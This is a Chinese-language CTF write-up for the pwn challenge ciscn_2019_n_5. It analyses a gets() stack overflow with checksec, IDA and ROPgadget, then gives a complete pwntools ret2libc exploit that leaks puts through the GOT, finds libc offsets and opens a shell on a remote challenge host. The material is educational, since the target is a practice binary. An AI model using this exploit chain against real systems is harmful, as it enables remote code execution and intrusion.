分析

  1. checksec
1
2
3
➜  pwn checksec --file=ciscn_2019_n_5
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH	Symbols		FORTIFY	Fortified	Fortifiable	FILE
Partial RELRO   No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   77) Symbols	  No	0		2		ciscn_2019_n_5
  1. ida
1
2
3
4
5
6
7
8
9
10
11
12
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char text[30]; // [rsp+0h] [rbp-20h] BYREF

  setvbuf(stdout, 0LL, 2, 0LL);
  puts("tell me your name");
  read(0, name, 0x64uLL);
  puts("wow~ nice name!");
  puts("What do you want to say to me?");
  gets(text);
  return 0;
}

gets函数存在溢出,查看text:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
-0000000000000020 ; D/A/*   : change type (data/ascii/array)
-0000000000000020 ; N       : rename
-0000000000000020 ; U       : undefine
-0000000000000020 ; Use data definition commands to create local variables and function arguments.
-0000000000000020 ; Two special fields " r" and " s" represent return address and saved registers.
-0000000000000020 ; Frame size: 20; Saved regs: 8; Purge: 0
-0000000000000020 ;
-0000000000000020
-0000000000000020 text            db 30 dup(?)
-0000000000000002                 db ? ; undefined
-0000000000000001                 db ? ; undefined
+0000000000000000  s              db 8 dup(?)
+0000000000000008  r              db 8 dup(?)
+0000000000000010
+0000000000000010 ; end of stack variables
  1. 搜索一下system和bin/sh,发现没有,只能自己构造了

ROP利用

  1. pop|ret
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
➜  pwn ROPgadget --binary ciscn_2019_n_5 --only 'pop|ret'
Gadgets information
============================================================
0x000000000040070c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040070e : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400710 : pop r14 ; pop r15 ; ret
0x0000000000400712 : pop r15 ; ret
0x000000000040070b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040070f : pop rbp ; pop r14 ; pop r15 ; ret
0x00000000004005a0 : pop rbp ; ret
0x0000000000400713 : pop rdi ; ret
0x0000000000400711 : pop rsi ; pop r15 ; ret
0x000000000040070d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004004c9 : ret
0x0000000000400532 : ret 0x200a
Unique gadgets found: 12
  • 0x0000000000400713 : pop rdi ; ret
  • 0x00000000004004c9 : ret
  1. main
1
2
pwndbg> info address main
Symbol "main" is a function at address 0x400636.
  • 0x400636 : main
  • 代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from pwn import *
from LibcSearcher import *
p = remote('node5.buuoj.cn',28140)
elf = ELF('./ciscn_2019_n_5')
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main = 0x400636
pop_rdi = 0x400713
ret = 0x4004c9
p.sendlineafter('tell me your name\n','aaa')
buf = b'a'*0x28 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt)+ p64(main)
p.sendlineafter('What do you want to say to me?\n',buf)
puts_addr = u64(p.recv(6).ljust(8,b'\x00'))
print(hex(puts_addr))
libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
sh = libc_base + libc.dump('str_bin_sh')
p.sendlineafter('tell me your name\n','aaa')
buf = b'a' * 0x28 + p64(pop_rdi) + p64(sh) + p64(ret) + p64(system)
p.sendline(buf)
p.interactive()